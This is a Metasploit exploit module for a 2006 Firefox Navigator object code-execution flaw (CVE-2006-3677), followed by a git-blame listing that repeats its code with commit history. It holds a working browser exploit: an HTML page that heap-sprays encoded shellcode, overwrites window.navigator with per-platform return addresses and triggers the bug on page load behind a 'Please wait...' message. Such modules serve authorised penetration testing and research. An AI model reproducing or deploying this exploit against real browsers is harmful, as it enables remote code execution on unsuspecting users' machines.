modules/exploits/multi/browser/mozilla_navigatorjava.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #  :ua_name    => HttpClients::FF,
  #  :ua_minver  => "1.5.0",
  #  :ua_maxver  => "1.5.1",
  #  :javascript => true,
  #  :rank       => NormalRanking, # reliable memory corruption
  #  :vuln_test  => %Q|
  #    is_vuln = false;
  #    if (navigator.javaEnabled()){
  #      is_vuln = true;
  #    }
  #    |,
  # })

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
          requires the Java plugin to be installed.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm'],
        'References' => [
          ['CVE', '2006-3677'],
          ['OSVDB', '27559'],
          ['BID', '19192'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
        ],
        'Payload' => {
          'Space' => 512,
          'BadChars' => ''
        },
        'Targets' => [
          [
            'Firefox 1.5.0.4 Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x08000800,
              'Fill' => '%u0800'
            }
          ],
          [
            'Firefox 1.5.0.4 Linux x86',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
              'Ret' => -0x58000000,
              'Fill' => '%ua8a8'
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              'Ret' => 0x0c000000,
              'Fill' => '%u0c0c'
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
              'Ret' => 0x1c000000,
              'Fill' => '%u1c1c'
            }
          ],
        ],
        'DisclosureDate' => '2006-07-25',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def on_request_uri(cli, _request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)).nil?)

    print_status("Sending #{name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

  def generate_html(payload)
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    return %|
<html><head>
<script>
  function Exploit() {
    if (window.navigator.javaEnabled) {
      var shellcode = unescape("#{enc_code}");
      var b = unescape("#{target['Fill']}");
      while (b.length <= 0x400000) b+=b;

      var c = new Array();
      for (var i =0; i<36; i++) {
        c[i] =
          b.substring(0,  0x100000 - shellcode.length) + shellcode +
          b.substring(0,  0x100000 - shellcode.length) + shellcode +
          b.substring(0,  0x100000 - shellcode.length) + shellcode +
          b.substring(0,  0x100000 - shellcode.length) + shellcode;
      }

      window.navigator = (#{target['Ret']} / 2);
      try {
        java.lang.reflect.Runtime.newInstance(
          java.lang.Class.forName("java.lang.Runtime"), 0
        );
      }catch(e){

      }
    }
  }
</script>
</head><body onload='Exploit()'>Please wait...</body></html>
    |
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = NormalRanking`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`# include Msf::Exploit::Remote::BrowserAutopwn`
			`# autopwn_info({`
Reduce number of modules available on BrowserAutopwn 2013-11-12 12:37:29 -06:00			`# :ua_name => HttpClients::FF,`
			`# :ua_minver => "1.5.0",`
			`# :ua_maxver => "1.5.1",`
			`# :javascript => true,`
			`# :rank => NormalRanking, # reliable memory corruption`
			`# :vuln_test => %Q\|`
			`# is_vuln = false;`
			`# if (navigator.javaEnabled()){`
			`# is_vuln = true;`
			`# }`
			`# \|,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`# })`
merge browser_autopwn back into trunk. This changes the database schema slightly, so make sure to db_destroy and db_create before using the database features. 2009-07-22 20:14:35 +00:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a code execution vulnerability in the Mozilla`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit`
			`requires the Java plugin to be installed.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['hdm'],`
			`'References' => [`
			`['CVE', '2006-3677'],`
			`['OSVDB', '27559'],`
			`['BID', '19192'],`
			`['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 512,`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'BadChars' => ''`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Targets' => [`
			`[`
			`'Firefox 1.5.0.4 Windows x86',`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`{`
			`'Platform' => 'win',`
			`'Arch' => ARCH_X86,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Ret' => 0x08000800,`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'Fill' => '%u0800'`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`}`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[`
			`'Firefox 1.5.0.4 Linux x86',`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`{`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_X86,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Ret' => -0x58000000,`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'Fill' => '%ua8a8'`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`}`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[`
			`'Firefox 1.5.0.4 Mac OS X PPC',`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`{`
			`'Platform' => 'osx',`
			`'Arch' => ARCH_PPC,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Ret' => 0x0c000000,`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'Fill' => '%u0c0c'`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`}`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[`
			`'Firefox 1.5.0.4 Mac OS X x86',`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`{`
			`'Platform' => 'osx',`
			`'Arch' => ARCH_X86,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Ret' => 0x1c000000,`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'Fill' => '%u1c1c'`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`}`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`],`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`],`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DisclosureDate' => '2006-07-25',`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`end`

Mass rubocop changes 2025-12-17 17:11:13 -05:00			`def on_request_uri(cli, _request)`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`# Re-generate the payload`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`return if ((p = regenerate_payload(cli)).nil?)`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`print_status("Sending #{name}")`
API change for the HTML mixin, the send_response method is no longer overloaded, instead exploits must call send_response_html to enable HTML evasion. The old method caused problems when a exploit needed HTML and non-HTML response capabilities 2006-12-10 03:26:53 +00:00			`send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Consistent use of handler(cli), removed the autofilter and dependency check stubs 2007-04-04 04:37:30 +00:00			`# Handle the payload`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`handler(cli)`
			`end`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`def generate_html(payload)`
			`enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))`

Mass rubocop changes 2025-12-17 17:11:13 -05:00			`return %\|`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`<html><head>`
			`<script>`
			`function Exploit() {`
			`if (window.navigator.javaEnabled) {`
don't hang the browser building the exploit buffer if we can't exploit it 2008-07-19 05:03:01 +00:00			`var shellcode = unescape("#{enc_code}");`
			`var b = unescape("#{target['Fill']}");`
			`while (b.length <= 0x400000) b+=b;`

			`var c = new Array();`
			`for (var i =0; i<36; i++) {`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`c[i] =`
			`b.substring(0, 0x100000 - shellcode.length) + shellcode +`
			`b.substring(0, 0x100000 - shellcode.length) + shellcode +`
don't hang the browser building the exploit buffer if we can't exploit it 2008-07-19 05:03:01 +00:00			`b.substring(0, 0x100000 - shellcode.length) + shellcode +`
			`b.substring(0, 0x100000 - shellcode.length) + shellcode;`
			`}`

Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`window.navigator = (#{target['Ret']} / 2);`
			`try {`
			`java.lang.reflect.Runtime.newInstance(`
			`java.lang.Class.forName("java.lang.Runtime"), 0`
			`);`
			`}catch(e){`
Removed alert() :-) 2006-07-31 02:51:43 +00:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`}`
			`}`
			`}`
			`</script>`
			`</head><body onload='Exploit()'>Please wait...</body></html>`
			`\|`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`